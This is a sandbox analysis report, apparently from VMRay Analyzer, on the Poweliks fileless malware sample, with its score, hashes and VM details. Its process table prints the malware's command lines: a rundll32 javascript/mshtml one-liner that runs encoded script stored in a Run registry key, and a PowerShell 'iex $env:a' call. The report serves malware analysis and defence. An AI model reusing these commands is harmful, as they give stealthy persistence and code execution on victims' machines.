Poweliks Fileless Malware | VMRay Analyzer Report
Try VMRay Analyzer
| Creation Time | 2017-08-21 17:58 (UTC+2) |
| VM Analysis Duration Time | 00:02:13 |
| Execution Successful |
|
| Sample Filename | poweliks_installer.exe |
| Command Line Parameters |
|
| Prescript |
|
| Number of Processes | 7 |
| Termination Reason | Timeout |
| Download | Archive Function Logfile Generic Logfile PCAP STIX/CybOX XML Summary JSON |
|
VTI Score
85 / 100
|
|
| VTI Database Version | 2.6 |
| VTI Rule Match Count | 14 |
| VTI Rule Type | Default (PE, ...) |
|
The operating system was rebooted during the analysis. |
|
|
The dump total size limit was reached during the analysis. Some memory dump may be missing in the reports. You can increase the limit in the configuration. |
| ID | PID | Monitor Reason | Integrity Level | Image Name | Command Line | Origin ID |
|---|---|---|---|---|---|---|
| #1 | 0xa00 | Analysis Target | High (Elevated) | poweliks_installer.exe | "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\poweliks_installer.exe" | |
| #2 | 0xa3c | Child Process | High (Elevated) | rundll32.exe | rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>") | #1 |
| #3 | 0xa58 | Child Process | High (Elevated) | powershell.exe | "C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe" iex $env:a | #2 |
| #4 | 0xa94 | Child Process | High (Elevated) | dllhost.exe | C:\Windows\syswow64\dllhost.exe | #3 |
| #5 | 0x674 | Autostart | Medium | rundll32.exe | "C:\Windows\System32\rundll32.exe" javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>") | |
| #6 | 0x578 | Child Process | Medium | powershell.exe | "C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe" iex $env:a | #5 |
| #7 | 0x220 | Child Process | Medium | dllhost.exe | C:\Windows\syswow64\dllhost.exe | #6 |
| ID | #17494 |
| MD5 Hash Value | 0181850239cd26b8fb8b72afb0e95eac |
| SHA1 Hash Value | bfa2dc3b9956a88a2e56bd6ab68d1f4f675a425a |
| SHA256 Hash Value | 4727b7ea70d0fc00f96a28de7fa3d97fa9d0b253bd63ae54fbbf0bd0c8b766bb |
| Filename | poweliks_installer.exe |
| File Size | 70.00 KB (71680 bytes) |
| File Type | Windows Exe (x86-32) |
| Analyzer Version | 2.2.0 |
| Analyzer Build Date | 2017-08-21 12:23 |
| Internet Explorer Version | 8.0.7601.17514 |
| Chrome Version | 58.0.3029.110 |
| Firefox Version | 25.0 |
| Flash Version | 10.3.183.75 |
| Java Version | 7.0.450 |
| VM Name | win7_64_sp1 |
| VM Architecture | x86 64-bit |
| VM OS | Windows 7 |
| VM Kernel Version | 6.1.7601.17514 (3844dbb9-2017-4967-be7a-a4a2c20430fa) |
